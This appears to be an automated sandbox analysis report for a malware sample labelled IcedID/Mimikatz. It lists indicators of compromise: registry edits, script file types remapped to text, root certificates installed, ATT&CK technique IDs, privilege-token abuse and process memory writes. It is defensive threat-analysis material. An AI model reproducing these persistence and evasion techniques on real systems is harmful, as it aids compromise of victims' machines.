Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	lunglbpll.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecisionReason = "1"	bubpucp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1"	lunglbpll.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecisionTime = b0cec8e3674ada01	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	bubpucp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{34DC3725-8642-49E4-BBB9-F5D0E395C9F7}\WpadDecisionTime = b0de39ae674ada01	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	bubpucp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{34DC3725-8642-49E4-BBB9-F5D0E395C9F7}\WpadDecision = "0"	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	cacls.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals	lunglbpll.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1"	lunglbpll.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{34DC3725-8642-49E4-BBB9-F5D0E395C9F7}\WpadNetworkName = "Network 2"	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-ad-b1-93-64-4b\WpadDecisionTime = b0de39ae674ada01	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	bubpucp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	bubpucp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	bubpucp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	bubpucp.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	bubpucp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	bubpucp.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	bubpucp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	bubpucp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	bubpucp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	bubpucp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	bubpucp.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2644	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
320	bubpucp.exe
3704	bubpucp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe

Suspicious behavior: LoadsDriver 31 IoCs

pid	Process
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found
484	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2700	bubpucp.exe
Token: SeDebugPrivilege	2788	bubpucp.exe
Token: SeDebugPrivilege	996	vfshost.exe
Token: SeAuditPrivilege	2676	svchost.exe
Token: SeDebugPrivilege	1816	lunglbpll.exe
Token: SeShutdownPrivilege	1816	lunglbpll.exe
Token: SeLockMemoryPrivilege	448	bpgzsl.exe
Token: SeLockMemoryPrivilege	448	bpgzsl.exe
Token: SeDebugPrivilege	896	lunglbpll.exe
Token: SeShutdownPrivilege	896	lunglbpll.exe
Token: SeDebugPrivilege	628	lunglbpll.exe
Token: SeShutdownPrivilege	628	lunglbpll.exe
Token: SeDebugPrivilege	1644	lunglbpll.exe
Token: SeShutdownPrivilege	1644	lunglbpll.exe
Token: SeDebugPrivilege	2656	lunglbpll.exe
Token: SeShutdownPrivilege	2656	lunglbpll.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
2700	bubpucp.exe
2700	bubpucp.exe
2788	bubpucp.exe
2788	bubpucp.exe
536	xohudmc.exe
992	rifzsk.exe
320	bubpucp.exe
320	bubpucp.exe
3704	bubpucp.exe
3704	bubpucp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2080 wrote to memory of 2976	2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe	28
PID 2080 wrote to memory of 2976	2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe	28
PID 2080 wrote to memory of 2976	2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe	28
PID 2080 wrote to memory of 2976	2080	2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe	28
PID 2976 wrote to memory of 2644	2976	cmd.exe	29
PID 2976 wrote to memory of 2644	2976	cmd.exe	29
PID 2976 wrote to memory of 2644	2976	cmd.exe	29
PID 2976 wrote to memory of 2644	2976	cmd.exe	29
PID 2976 wrote to memory of 2700	2976	cmd.exe	40
PID 2976 wrote to memory of 2700	2976	cmd.exe	40
PID 2976 wrote to memory of 2700	2976	cmd.exe	40
PID 2976 wrote to memory of 2700	2976	cmd.exe	40
PID 2788 wrote to memory of 2244	2788	bubpucp.exe	38
PID 2788 wrote to memory of 2244	2788	bubpucp.exe	38
PID 2788 wrote to memory of 2244	2788	bubpucp.exe	38
PID 2788 wrote to memory of 2244	2788	bubpucp.exe	38
PID 2244 wrote to memory of 2808	2244	cmd.exe	36
PID 2244 wrote to memory of 2808	2244	cmd.exe	36
PID 2244 wrote to memory of 2808	2244	cmd.exe	36
PID 2244 wrote to memory of 2808	2244	cmd.exe	36
PID 2244 wrote to memory of 2652	2244	cmd.exe	87
PID 2244 wrote to memory of 2652	2244	cmd.exe	87
PID 2244 wrote to memory of 2652	2244	cmd.exe	87
PID 2244 wrote to memory of 2652	2244	cmd.exe	87
PID 2244 wrote to memory of 2764	2244	cmd.exe	32
PID 2244 wrote to memory of 2764	2244	cmd.exe	32
PID 2244 wrote to memory of 2764	2244	cmd.exe	32
PID 2244 wrote to memory of 2764	2244	cmd.exe	32
PID 2244 wrote to memory of 2688	2244	cmd.exe	35
PID 2244 wrote to memory of 2688	2244	cmd.exe	35
PID 2244 wrote to memory of 2688	2244	cmd.exe	35
PID 2244 wrote to memory of 2688	2244	cmd.exe	35
PID 2244 wrote to memory of 2664	2244	cmd.exe	34
PID 2244 wrote to memory of 2664	2244	cmd.exe	34
PID 2244 wrote to memory of 2664	2244	cmd.exe	34
PID 2244 wrote to memory of 2664	2244	cmd.exe	34
PID 2244 wrote to memory of 2600	2244	cmd.exe	33
PID 2244 wrote to memory of 2600	2244	cmd.exe	33
PID 2244 wrote to memory of 2600	2244	cmd.exe	33
PID 2244 wrote to memory of 2600	2244	cmd.exe	33
PID 2788 wrote to memory of 320	2788	bubpucp.exe	168
PID 2788 wrote to memory of 320	2788	bubpucp.exe	168
PID 2788 wrote to memory of 320	2788	bubpucp.exe	168
PID 2788 wrote to memory of 320	2788	bubpucp.exe	168
